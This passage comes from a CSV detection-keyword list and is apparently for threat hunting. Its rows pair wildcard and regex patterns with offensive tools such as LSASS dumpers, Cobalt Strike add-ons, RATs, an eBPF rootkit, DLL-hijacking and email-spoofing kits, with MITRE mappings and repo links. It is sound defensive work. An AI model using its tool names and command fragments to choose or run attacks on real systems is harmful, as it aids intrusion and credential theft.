A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Source\wdextract\*",".{0,1000}Source\\wdextract\\.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\dll_x64\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\dll_x86\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x86\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\lib\zlibwapi32.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi32\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*Source\wdextract\zlib\lib\zlibwapi64.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi64\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*SourcePoint*Loader.go*",".{0,1000}SourcePoint.{0,1000}Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*source-teamserver.sh*",".{0,1000}source\-teamserver\.sh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary 
in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*spacerunner.exe -i *.ps1* -o *.exe*",".{0,1000}spacerunner\.exe\s\-i\s.{0,1000}\.ps1.{0,1000}\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*SpaceRunner-master.zip*",".{0,1000}SpaceRunner\-master\.zip.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*spaceshuttle.io.all@gmail.com*",".{0,1000}spaceshuttle\.io\.all\@gmail\.com.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*SpamChannel-main.zip*",".{0,1000}SpamChannel\-main\.zip.{0,1000}","offensive_tool_keyword","SpamChannel","Spoof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","4","305","30","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*Spartacus.exe --mode proxy*",".{0,1000}Spartacus\.exe\s\-\-mode\sproxy.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*Spartacus-main.zip*",".{0,1000}Spartacus\-main\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*spartacus-proxy-*.log*",".{0,1000}spartacus\-proxy\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus
DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*Spartacus-v2.*-x64.zip*",".{0,1000}Spartacus\-v2\..{0,1000}\-x64\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*Spawn a phantom shell - with pattern-based trigger*",".{0,1000}Spawn\sa\sphantom\sshell\s\-\swith\spattern\-based\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Spawn CoercedPotato as a Reflective 
DLL*",".{0,1000}Spawn\sCoercedPotato\sas\sa\sReflective\sDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*Spawn encrypted pseudo-shell with IP - with *",".{0,1000}Spawn\sencrypted\spseudo\-shell\swith\sIP\s\-\swith\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Spawn plaintext pseudo-shell with IP - using *",".{0,1000}Spawn\splaintext\spseudo\-shell\swith\sIP\s\-\susing\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*spawn/runshellcode*",".{0,1000}spawn\/runshellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*spawn_cmd.dll*",".{0,1000}spawn_cmd\.dll.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","243","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*spawnas * \ HACKER https*",".{0,1000}spawnas\s.{0,1000}\s\\\sHACKER\shttps.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SpawnAsAgentManager.cs*",".{0,1000}SpawnAsAgentManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*spawnasshellcode*",".{0,1000}spawnasshellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnAsShellcodeManager*",".{0,1000}SpawnAsShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawneRv6yTYhShell*",".{0,1000}SpawneRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & 
HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*SpawnPPIDAgentManager*",".{0,1000}SpawnPPIDAgentManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnShellcode.cs*",".{0,1000}SpawnShellcode\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnShellcodeManager*",".{0,1000}SpawnShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*spawnT2W(*",".{0,1000}spawnT2W\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*SpawnTheThing(*",".{0,1000}SpawnTheThing\(.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*spawnto *.exe",".{0,1000}spawnto\s.{0,1000}\.exe","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*spawnto */path *",".{0,1000}spawnto\s.{0,1000}\/path\s.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*spawnto_x64 -Application *",".{0,1000}spawnto_x64\s\-Application\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*'spawnto_x64'*",".{0,1000}\'spawnto_x64\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*spawnto_x64.py*",".{0,1000}spawnto_x64\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*spawnto_x86 -Application*",".{0,1000}spawnto_x86\s\-Application.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*'spawnto_x86'*",".{0,1000}\'spawnto_x86\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection 
controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*spawnto_x86.py*",".{0,1000}spawnto_x86\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*specialtokengroupprivs.py*",".{0,1000}specialtokengroupprivs\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. 
a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Specified user is a Domain Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sDomain\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Specified user is a Enterprise Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sEnterprise\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Specify domain for enumeration*",".{0,1000}Specify\sdomain\sfor\senumeration.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Specify -instanceid 1337*Specify -source 'Persistence*",".{0,1000}Specify\s\-instanceid\s1337.{0,1000}Specify\s\-source\s\'Persistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - 